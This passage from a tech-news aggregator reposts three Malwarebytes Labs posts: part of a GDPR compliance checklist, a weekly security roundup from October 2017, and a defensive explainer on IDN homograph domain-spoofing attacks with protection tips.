    • How do you protect stored data?
    • Where are client data backups kept? (e.g., removable storage media)
    • Are their gaps in the current processes or controls you already have in place?
  • Hire. Having a Chief Protection Officer (CPO) or Data Protection Officer (DPO) may be crucial, yet not every organization that controls or processes user data must have a DPO. The GDPR explicitly requires authorities that (1) process personal data, (2) handle a lot of data, and (3) manage “special categories of personal data”—genetic, biometric, and health data, to name a few—to hire or appoint a DPO. Its principal role is to ensure that companies remain compliant with GDPR standards.Organizations who merely don’t have the time or resources to prepare may decide to hire a third-party consultant to help them out, and this is fine, too.
  • Plan. Draft a data protection and mitigation plan that best suits your company. Following a template doesn’t cut it anymore. Plans must be customized to address or reduce the risks that come with how a business processes data. Also, firms with privacy policies in place must revamp them to cover extended rights that are given to EU and UK nationals. To guide you on how to go about doing this, try answering these questions:
    • How will you keep the stored data safe? (e.g., encryption)
    • How should you handle requests from clients to delete their data?
    • How can you make data available to clients?
    • How can you make client data portable?
    • What should your incident response, in the event of a breach, look like?
  • Implement. Now that you made the assessment, hired a consultant, and answered the questions and planned around them, it’s time to put those plans into action. Start backing up files, encrypting them if you think it’s necessary, limiting access to sensitive data to specific individuals only, training up your staff about your security and privacy policies, and making sure that all your supply chains have been informed and confirmed to be on board with the changes.
  • Test. If you have envisioned and drafted an incident response plan, you should put it to the test. See how well the relevant teams in your organization handle a pretend breach based on the new protocol, identify the good points and bad points from it, and make the necessary adjustments to remove or at least minimize the latter. After changes are made, further refine the terms by testing them again and again.
  • Persevere. Starting is one thing, but keeping your plan in place is another. Businesses must continue to remain compliant in the long term by doing a continuous assessment and process improvement. This also includes the regular training of employees and continuing to adhere to a culture of security and privacy in the workplace.

The coming of the GDPR has caused a lot of businesses to recoil out of fear and hype. Unfortunately, this also resulted in them putting off making the much-needed improvements to their data processing activities and security. While there are penalties for non-compliance, this shouldn’t be the main reason why companies must go through the ordeal of what we have listed above. It all boils down to businesses taking better care of their clients by protecting their data. Not only will this foster customer loyalty, but it also allows the company to stay in business.

The post Make way for the GDPR: Is your business ready? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 02 – October 08)

Malwarebytes - Mon, 10/09/2017 - 20:26

Last week, we gave you some tips for National Cybersecurity Awareness Month, walked through an exploration of a small adware file, and explored the complicated world of the Homograph attack. Here’s what else happened in security.


Many of our team members attended VB2017 in Madrid, one of the premier yearly security conferences that brings together researchers, companies, law enforcement, and more in an effort to explore the latest security research. Here’s a collection of articles from The Register’s John Leyden, who was in attendance:

  • Bulletproof hosts stay online by operating out of disputed backwaters: A look at how dubious hosts are retreating to places where they can continue to offer dubious services.
  • Spy vs. spy vs. hacker vs… who is THAT? Everyone’s hacking each other: The problem of Intel gathering when everyone is muddying the waters.
  • Hey, IoT vendors. When a paediatric nurse tells you to fix security, you definitely screwed up: The alarming world of IoT medical devices.
  • Avast urges devs to secure toolchains after hacked build box led to CCleaner disaster: An interesting look at the timeline behind the recent CCleaner issues.
  • Video games used to be an escape. Now not even they are safe from ads: My own talk, where I explore the long(ish) history of Advergaming, tricks used to force you to look at ads in games, and how it threatens to reshape many of your real-world interactions via augmented reality. Once the VB talks are uploaded to YouTube, I’ll be linking to many of them.
Other news

Stay safe everyone!

The post A week in security (October 02 – October 08) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Out of character: Homograph attacks explained

Malwarebytes - Fri, 10/06/2017 - 15:00

In April, Xudong Zheng, a security enthusiast based in New York, found a flaw in some modern browsers in the way they handle domain names. While Chrome, Firefox, and Opera already have security measures in place to cue users that they might be visiting a destination they thought was legitimate, at that time these browsers did not flag a fake domain name that used all Latin look-alike characters taken from another foreign language. Zheng demonstrated this when he created and registered a proof-of-concept (PoC) page for the domain, аррӏе.com, which was written in pure Cyrillic characters.

What is a homograph attack?

A homograph attack is a method of deception wherein a threat actor leverages on the similarities of character scripts to create and register phony domains of existing ones to fool users and lure them into visiting. This attack has some known aliases: homoglyph attack, script spoofing, and homograph domain name spoofingCharacters—i.e., letters and numbers—that look alike are called homoglyphs or homographs, thus the name of the attack. Examples of such are the Latin small letter O (U+006F) and the Digit zero (U+0030). Hypothetically, one might register or and get away with it. But in this day and age, such simple character swaps could be easily detected.

In an internationalized domain name (IDN) homograph attack, a threat actor creates and registers one or several fake domains using at least one look-alike character from a different language. Again, hypothetically, one might register gοο, but not before swapping the Latin small letter O (U+006F) with the Greek small letter Omicron (U+03BF).

Zheng’s PoC is another example of an IDN homograph attack, so let’s list down each character he used to illustrate how this particular attack can be highly successful and dangerous if used in the wild. Interestingly, an operating system’s typeface of choice could make it easy or difficult for users to visually differentiate non-Latin characters from Latin ones.

Table 1: We used Segoe UI, Microsoft’s system-wide typeface, here.

To the human eye, these Cyrillic glyphs can easily be confused with their Latin counterparts. Computers, however, read these confusables differently, as we can see from the different hex codes assigned to them.

Table 2: We used San Francisco, Apple’s system-wide typeface, here. It’s worth noting that OSX distinguishes the Cyrillic small letter Palochka from the Latin small letter L; however, it cannot show the difference between the Latin small letter L with the Latin capital letter I, as per the text “Cyrillic small letter Ie”.

According to this bug report, it seems that even the system-wide font for Linux doesn’t distinguish confusable characters either.

The use of all-Cyrillic glyphs—or any other non-Latin characters for this matter—for domain names isn’t the problem. IDN has made it possible for internet users around the globe to create and access domains using their native language scripts. The problem is when these glyphs are misused to deceive internet users.

Is this a new form of online threat?

Homograph attacks have been around for years. As far as we know, Zhang’s PoC was the first of its kind to make headlines and spark a conversation among internet users.

Below are other examples of homographed domains and how they were used:

  • To raise awareness, a security consultant highlighted the common misconception that sometimes a Latin capital letter I (U+0049) looks similar to a Latin small letter L (U+006C) by registering a fake Lloyds Bank website and adding an SSL certificate to it to make it look as legitimate as the real one.
  • A security researcher from NTT Security shared his experience about a friend of his who received several Google Analytics spam containing the domain, secret[DOT]ɢoogle[DOT]com. The “ɢ” there wasn’t the Latin capital letter G (U+0047) but a Latin letter small capital G (U+0262).
  • A security researcher from NewSky Security found an impersonated Adobe website serving the Betabot malware, pretending to be an Adobe Flash Player installer file. The threat actor used the Latin small letter B with Dot below (U+1E05) to replace the Latin small letter B (U+0062) in “”.
How is this different from typosquatting?

Although typosquatting also uses visual tricks to deceive users, it relies heavily on users mistyping a URL in the address bar, hence, the “typo” in its name.

Are all homograph attacks just phishing attacks?

Not necessarily. Although homograph attacks usually involve phishing threat actors could create fake yet believable websites for other fraudulent purposes or to introduce malware onto user systems, as is the case of the bogus Adobe website we mentioned earlier.

In this in-depth report about IDN homograph attacks, our friends at Symantec have noted that several homographed domains they found were either part of a malvertising network, hosting exploit kits and malicious mobile apps, or generated by botnets.

How can we protect ourselves from homograph attacks?

Browser tools have been created, such as Punycode Alert and the Quero Toolbar, to aid users in alerting them of potential homograph attacks. Users have the discretion of adopting them alongside the built-in security mechanisms in today’s browsers. However, no tool can replace vigilance when browsing online and a solid cybersecurity hygiene. This includes:

  • Regularly updating your browser (They may be your first line of defense against homograph attacks)
  • Confirming that the legitimate site you’re on has an EVC
  • Avoid clicking links from emails, chat messages, and other publicly available content, most especially social media sites, without ensuring that the visible link is indeed the true destination.

Remember: Eyes open.

Stay safe!


Additional reading(s):




The Malwarebytes Labs Team

The post Out of character: Homograph attacks explained appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds